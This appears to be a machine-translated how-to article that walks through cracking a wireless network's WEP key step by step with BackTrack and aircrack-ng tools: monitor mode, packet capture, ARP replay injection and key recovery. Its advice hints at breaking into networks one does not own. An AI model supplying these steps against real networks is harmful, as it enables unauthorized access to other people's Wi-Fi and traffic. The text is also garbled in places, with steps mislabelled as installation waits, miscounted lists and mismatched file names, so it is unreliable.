Breaking cryptographic protection requires knowledge of some basic principles. You need to understand how encryption works. We will tell you how to do everything quickly and without problems using a special packet sniffer program.
Steps

Step 1. Use the program on a Linux system
Windows system cannot parse WEP packets, you can use Linux boot disk.

Step 2. Download a packet analyzer program
For example Backtrack. Download the iso image and make a bootable CD / DVD.

Step 3. Download Linux and Backtrack
Use a bootable CD / DVDs.
Note that Linux does not need to be installed on a hard drive to use it. You can just download it. This means that every time Backtrack is closed, all data will be lost

Step 4. Select the download option
After loading, the Backtrack window will appear. You can select different options using the arrow keys on the keyboard. As an example, we'll show you what to do when choosing the first option.

Step 5. Load the graphical interface through the command window
In this case, Backtrack will start in the command window. Type startx to continue.

Step 6. Launch a command line in Linux, usually the Terminal button in the lower left corner of the screen
Select Application - Accessories - Terminal.

Step 7. Wait for the terminal to open

Step 8. Look at the WLAN type
Enter: "airmon-ng" (without quotes). An inscription will appear, for example, this: wlan0.

Step 9. Collect information about the access point
Enter the command: "airodump-ng wlan0" (without quotes). You will see three things:
- BSSID
- Channel
- ESSID (AP Name)
- Here's what happens:
- BSSID 00: 17: 3F: 76: 36: 6E
- Channel 1
- ESSID (AP Name) Suleman

Step 10. Enter the following command
We use the information from the example, but you will have to substitute your information. Command: "airodump-ng -w wep -c 1 - bssid 00: 17: 3F: 76: 36: 6E wlan0" (without quotes).

Step 11. Wait for the installation to complete

Step 12. Open a new terminal window
Enter the command substituting your BSSID, Channel and ESSID settings. Command: "aireplay-ng -1 0 –a 00: 17: 3f: 76: 36: 6E wlan0" (without quotes).

Step 13. Open a new terminal window
Enter: "aireplay-ng -3 –b 00: 17: 3f: 76: 36: 6e wlan0".

Step 14. Wait for the installation to complete

Step 15. Go to the first terminal window

Step 16. Wait until the values in this window rise to 30000 and above
This will take 15 to 60 minutes, depending on the signal strength.

Step 17. Open the third terminal window and press Ctrl + c

Step 18. Open directories
Enter the command: "dir". A list of directories saved during decryption will appear.

Step 19. Use a cap file
For example: "aircrack-ng web-02.cap". The installation window will appear.

Step 20. Break the encrypted WEP key
After the installation is complete, you should be able to break the key. In our case, the key was {ADA2D18D2E}.
Advice
- Encryption laws are different in different networks. Find out more about the network you are trying to get into. Be prepared for the consequences.
- Many packet analyzers such as Wireshark, Airsnort, and Kismet are available as source code. You will need experience with Linux or Windows source code in order to use Airsnort or Kismet. Wireshark / Ethereal has a separate installer.
- You will most likely be able to find ready-to-use versions of these programs.
Warnings
- Be careful. Don't hack the local McDonalds network while sitting at their table.
- Misuse of the information we provide may be illegal.
- You need a wireless card that is compatible with these programs.